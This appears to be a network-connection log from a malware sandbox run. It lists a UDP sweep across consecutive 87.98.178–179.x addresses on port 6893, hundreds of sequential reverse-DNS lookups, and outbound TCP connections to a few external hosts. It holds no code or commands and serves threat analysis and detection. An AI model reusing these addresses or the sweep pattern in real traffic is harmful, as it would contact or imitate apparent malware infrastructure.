FR 87.98.178.228:6893 udp
FR 87.98.178.229:6893 udp
FR 87.98.178.230:6893 udp
FR 87.98.178.231:6893 udp
FR 87.98.178.232:6893 udp
FR 87.98.178.233:6893 udp
FR 87.98.178.234:6893 udp
FR 87.98.178.235:6893 udp
FR 87.98.178.236:6893 udp
FR 87.98.178.237:6893 udp
FR 87.98.178.238:6893 udp
FR 87.98.178.239:6893 udp
FR 87.98.178.240:6893 udp
FR 87.98.178.241:6893 udp
FR 87.98.178.242:6893 udp
FR 87.98.178.243:6893 udp
FR 87.98.178.244:6893 udp
FR 87.98.178.245:6893 udp
FR 87.98.178.246:6893 udp
FR 87.98.178.247:6893 udp
FR 87.98.178.248:6893 udp
FR 87.98.178.249:6893 udp
FR 87.98.178.250:6893 udp
FR 87.98.178.251:6893 udp
FR 87.98.178.252:6893 udp
FR 87.98.178.253:6893 udp
FR 87.98.178.254:6893 udp
US 8.8.8.8:53 2.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 3.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 4.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 5.176.98.87.in-addr.arpa udp
RU 91.218.114.26:80 91.218.114.26 tcp
US 8.8.8.8:53 6.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 7.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 8.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 9.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 10.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 11.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 12.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 13.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 14.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 15.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 16.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 17.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 18.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 19.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 20.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 21.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 22.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 23.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 24.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 25.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 26.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 27.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 28.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 29.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 30.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 31.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 32.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 33.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 34.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 35.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 36.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 37.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 38.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 39.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 40.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 41.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 42.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 43.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 44.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 45.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 46.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 47.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 48.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 49.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 50.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 51.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 52.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 53.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 54.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 56.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 55.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 57.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 58.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 59.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 60.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 61.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 62.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 63.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 64.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 65.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 66.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 67.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 68.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 69.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 70.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 71.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 72.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 73.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 74.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 75.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 76.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 77.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 78.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 79.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 80.176.98.87.in-addr.arpa udp
FR 87.98.178.255:6893 udp
FR 87.98.179.0:6893 udp
FR 87.98.179.1:6893 udp
FR 87.98.179.2:6893 udp
FR 87.98.179.3:6893 udp
FR 87.98.179.4:6893 udp
FR 87.98.179.5:6893 udp
FR 87.98.179.6:6893 udp
FR 87.98.179.7:6893 udp
FR 87.98.179.8:6893 udp
FR 87.98.179.9:6893 udp
FR 87.98.179.10:6893 udp
FR 87.98.179.11:6893 udp
FR 87.98.179.12:6893 udp
FR 87.98.179.13:6893 udp
FR 87.98.179.14:6893 udp
FR 87.98.179.15:6893 udp
FR 87.98.179.16:6893 udp
FR 87.98.179.17:6893 udp
FR 87.98.179.18:6893 udp
FR 87.98.179.19:6893 udp
FR 87.98.179.20:6893 udp
FR 87.98.179.21:6893 udp
FR 87.98.179.22:6893 udp
FR 87.98.179.23:6893 udp
FR 87.98.179.24:6893 udp
FR 87.98.179.25:6893 udp
FR 87.98.179.26:6893 udp
FR 87.98.179.27:6893 udp
FR 87.98.179.28:6893 udp
FR 87.98.179.29:6893 udp
FR 87.98.179.30:6893 udp
FR 87.98.179.31:6893 udp
FR 87.98.179.32:6893 udp
FR 87.98.179.33:6893 udp
FR 87.98.179.34:6893 udp
FR 87.98.179.35:6893 udp
FR 87.98.179.36:6893 udp
FR 87.98.179.37:6893 udp
FR 87.98.179.38:6893 udp
FR 87.98.179.39:6893 udp
FR 87.98.179.40:6893 udp
FR 87.98.179.41:6893 udp
FR 87.98.179.42:6893 udp
FR 87.98.179.43:6893 udp
FR 87.98.179.44:6893 udp
FR 87.98.179.45:6893 udp
FR 87.98.179.46:6893 udp
FR 87.98.179.47:6893 udp
FR 87.98.179.48:6893 udp
FR 87.98.179.49:6893 udp
FR 87.98.179.50:6893 udp
FR 87.98.179.51:6893 udp
FR 87.98.179.52:6893 udp
FR 87.98.179.53:6893 udp
US 8.8.8.8:53 81.176.98.87.in-addr.arpa udp
FR 87.98.179.54:6893 udp
FR 87.98.179.55:6893 udp
FR 87.98.179.56:6893 udp
FR 87.98.179.57:6893 udp
FR 87.98.179.58:6893 udp
FR 87.98.179.59:6893 udp
FR 87.98.179.60:6893 udp
FR 87.98.179.61:6893 udp
FR 87.98.179.62:6893 udp
FR 87.98.179.63:6893 udp
FR 87.98.179.64:6893 udp
FR 87.98.179.65:6893 udp
FR 87.98.179.66:6893 udp
FR 87.98.179.67:6893 udp
FR 87.98.179.68:6893 udp
FR 87.98.179.69:6893 udp
FR 87.98.179.70:6893 udp
FR 87.98.179.71:6893 udp
FR 87.98.179.72:6893 udp
FR 87.98.179.73:6893 udp
FR 87.98.179.74:6893 udp
FR 87.98.179.75:6893 udp
FR 87.98.179.76:6893 udp
FR 87.98.179.77:6893 udp
FR 87.98.179.78:6893 udp
FR 87.98.179.79:6893 udp
FR 87.98.179.80:6893 udp
FR 87.98.179.81:6893 udp
FR 87.98.179.82:6893 udp
FR 87.98.179.83:6893 udp
FR 87.98.179.84:6893 udp
FR 87.98.179.85:6893 udp
FR 87.98.179.86:6893 udp
FR 87.98.179.87:6893 udp
FR 87.98.179.88:6893 udp
FR 87.98.179.89:6893 udp
FR 87.98.179.90:6893 udp
FR 87.98.179.91:6893 udp
FR 87.98.179.92:6893 udp
FR 87.98.179.93:6893 udp
FR 87.98.179.94:6893 udp
FR 87.98.179.95:6893 udp
FR 87.98.179.96:6893 udp
FR 87.98.179.97:6893 udp
FR 87.98.179.98:6893 udp
FR 87.98.179.99:6893 udp
FR 87.98.179.100:6893 udp
FR 87.98.179.101:6893 udp
FR 87.98.179.102:6893 udp
FR 87.98.179.103:6893 udp
FR 87.98.179.104:6893 udp
FR 87.98.179.105:6893 udp
FR 87.98.179.106:6893 udp
FR 87.98.179.107:6893 udp
FR 87.98.179.108:6893 udp
FR 87.98.179.109:6893 udp
FR 87.98.179.110:6893 udp
FR 87.98.179.111:6893 udp
FR 87.98.179.112:6893 udp
FR 87.98.179.113:6893 udp
FR 87.98.179.114:6893 udp
FR 87.98.179.115:6893 udp
FR 87.98.179.116:6893 udp
FR 87.98.179.117:6893 udp
FR 87.98.179.118:6893 udp
FR 87.98.179.119:6893 udp
FR 87.98.179.120:6893 udp
FR 87.98.179.121:6893 udp
FR 87.98.179.122:6893 udp
FR 87.98.179.123:6893 udp
FR 87.98.179.124:6893 udp
FR 87.98.179.125:6893 udp
FR 87.98.179.126:6893 udp
FR 87.98.179.127:6893 udp
FR 87.98.179.128:6893 udp
FR 87.98.179.129:6893 udp
FR 87.98.179.130:6893 udp
FR 87.98.179.131:6893 udp
FR 87.98.179.132:6893 udp
FR 87.98.179.133:6893 udp
FR 87.98.179.134:6893 udp
FR 87.98.179.135:6893 udp
FR 87.98.179.136:6893 udp
FR 87.98.179.137:6893 udp
FR 87.98.179.138:6893 udp
FR 87.98.179.139:6893 udp
FR 87.98.179.140:6893 udp
FR 87.98.179.141:6893 udp
FR 87.98.179.142:6893 udp
FR 87.98.179.143:6893 udp
FR 87.98.179.144:6893 udp
FR 87.98.179.145:6893 udp
FR 87.98.179.146:6893 udp
FR 87.98.179.147:6893 udp
FR 87.98.179.148:6893 udp
FR 87.98.179.149:6893 udp
FR 87.98.179.150:6893 udp
FR 87.98.179.151:6893 udp
FR 87.98.179.152:6893 udp
FR 87.98.179.153:6893 udp
FR 87.98.179.154:6893 udp
FR 87.98.179.155:6893 udp
FR 87.98.179.156:6893 udp
FR 87.98.179.157:6893 udp
FR 87.98.179.158:6893 udp
FR 87.98.179.159:6893 udp
FR 87.98.179.160:6893 udp
FR 87.98.179.161:6893 udp
FR 87.98.179.162:6893 udp
FR 87.98.179.163:6893 udp
FR 87.98.179.164:6893 udp
FR 87.98.179.165:6893 udp
FR 87.98.179.166:6893 udp
FR 87.98.179.167:6893 udp
FR 87.98.179.168:6893 udp
FR 87.98.179.169:6893 udp
FR 87.98.179.170:6893 udp
FR 87.98.179.171:6893 udp
FR 87.98.179.172:6893 udp
FR 87.98.179.173:6893 udp
FR 87.98.179.174:6893 udp
FR 87.98.179.175:6893 udp
FR 87.98.179.176:6893 udp
FR 87.98.179.177:6893 udp
FR 87.98.179.178:6893 udp
FR 87.98.179.179:6893 udp
FR 87.98.179.180:6893 udp
FR 87.98.179.181:6893 udp
FR 87.98.179.182:6893 udp
FR 87.98.179.183:6893 udp
FR 87.98.179.184:6893 udp
FR 87.98.179.185:6893 udp
FR 87.98.179.186:6893 udp
FR 87.98.179.187:6893 udp
FR 87.98.179.188:6893 udp
FR 87.98.179.189:6893 udp
FR 87.98.179.190:6893 udp
FR 87.98.179.191:6893 udp
FR 87.98.179.192:6893 udp
FR 87.98.179.193:6893 udp
FR 87.98.179.194:6893 udp
FR 87.98.179.195:6893 udp
FR 87.98.179.196:6893 udp
FR 87.98.179.197:6893 udp
FR 87.98.179.198:6893 udp
FR 87.98.179.199:6893 udp
FR 87.98.179.200:6893 udp
FR 87.98.179.201:6893 udp
FR 87.98.179.202:6893 udp
FR 87.98.179.203:6893 udp
FR 87.98.179.204:6893 udp
FR 87.98.179.205:6893 udp
FR 87.98.179.206:6893 udp
FR 87.98.179.207:6893 udp
FR 87.98.179.208:6893 udp
FR 87.98.179.209:6893 udp
FR 87.98.179.210:6893 udp
FR 87.98.179.211:6893 udp
FR 87.98.179.212:6893 udp
FR 87.98.179.213:6893 udp
FR 87.98.179.214:6893 udp
FR 87.98.179.215:6893 udp
FR 87.98.179.216:6893 udp
FR 87.98.179.217:6893 udp
FR 87.98.179.218:6893 udp
FR 87.98.179.219:6893 udp
FR 87.98.179.220:6893 udp
FR 87.98.179.221:6893 udp
FR 87.98.179.222:6893 udp
FR 87.98.179.223:6893 udp
FR 87.98.179.224:6893 udp
FR 87.98.179.225:6893 udp
FR 87.98.179.226:6893 udp
FR 87.98.179.227:6893 udp
FR 87.98.179.228:6893 udp
FR 87.98.179.229:6893 udp
FR 87.98.179.230:6893 udp
FR 87.98.179.231:6893 udp
FR 87.98.179.232:6893 udp
FR 87.98.179.233:6893 udp
FR 87.98.179.234:6893 udp
FR 87.98.179.235:6893 udp
FR 87.98.179.236:6893 udp
FR 87.98.179.237:6893 udp
FR 87.98.179.238:6893 udp
FR 87.98.179.239:6893 udp
FR 87.98.179.240:6893 udp
FR 87.98.179.241:6893 udp
FR 87.98.179.242:6893 udp
FR 87.98.179.243:6893 udp
FR 87.98.179.244:6893 udp
FR 87.98.179.245:6893 udp
FR 87.98.179.246:6893 udp
FR 87.98.179.247:6893 udp
FR 87.98.179.248:6893 udp
FR 87.98.179.249:6893 udp
FR 87.98.179.250:6893 udp
FR 87.98.179.251:6893 udp
FR 87.98.179.252:6893 udp
FR 87.98.179.253:6893 udp
FR 87.98.179.254:6893 udp
US 8.8.8.8:53 82.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 83.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 84.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 85.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 86.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 87.176.98.87.in-addr.arpa udp
RU 91.218.114.26:80 91.218.114.26 tcp
US 8.8.8.8:53 88.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 89.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 90.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 92.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 91.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 93.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 94.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 95.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 96.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 97.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 98.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 99.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 100.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 101.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 102.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 103.176.98.87.in-addr.arpa udp
FR 87.98.179.255:6893 udp
US 8.8.8.8:53 104.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 105.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 106.176.98.87.in-addr.arpa udp
RU 91.218.114.31:80 tcp
US 8.8.8.8:53 107.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 108.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 109.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 110.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 111.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 112.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 113.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 114.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 115.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 116.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 117.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 118.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 119.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 120.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 121.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 122.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 123.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 124.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 125.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 126.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 127.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 128.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 129.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 130.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 132.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 131.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 133.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 134.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 135.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 136.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 137.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 138.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 139.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 140.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 141.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 142.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 143.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 144.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 145.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 146.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 147.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 148.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 149.176.98.87.in-addr.arpa udp
SE 171.25.193.9:80 tcp
US 8.8.8.8:53 150.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 151.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 152.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 153.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 154.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 155.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 156.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 157.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 158.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 159.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 160.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 161.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 162.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 163.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 164.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 165.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 166.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 167.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 168.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 169.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 170.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 171.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 173.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 174.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 172.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 175.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 176.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 177.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 178.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 179.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 180.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 181.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 182.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 183.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 184.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 185.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 186.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 187.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 188.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 189.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 190.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 191.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 192.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 193.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 194.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 195.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 196.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 197.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 198.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 199.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 200.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 201.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 202.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 203.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 204.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 205.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 206.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 208.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 207.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 210.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 211.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 212.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 213.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 214.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 215.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 216.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 217.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 218.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 219.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 220.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 221.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 222.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 223.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 224.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 225.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 226.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 227.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 228.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 229.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 231.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 230.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 232.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 233.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 234.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 235.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 236.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 237.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 238.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 239.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 240.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 241.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 242.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 243.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 244.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 245.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 246.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 247.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 248.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 249.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 250.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 251.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 252.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 253.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 254.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 255.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 0.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 1.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 2.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 3.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 4.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 5.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 6.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 8.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 7.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 9.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 10.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 11.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 12.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 13.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 14.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 15.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 16.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 17.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 18.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 19.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 20.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 22.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 21.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 24.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 25.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 26.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 27.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 28.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 30.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 29.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 31.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 32.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 33.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 34.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 35.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 36.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 37.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 38.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 39.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 40.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 41.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 42.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 43.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 44.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 45.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 46.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 47.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 48.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 49.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 50.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 51.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 52.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 53.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 54.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 55.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 56.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 57.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 58.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 59.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 60.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 61.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 62.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 64.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 63.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 65.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 66.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 67.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 68.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 69.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 70.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 71.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 72.177.98.87.in-addr.arpa udp
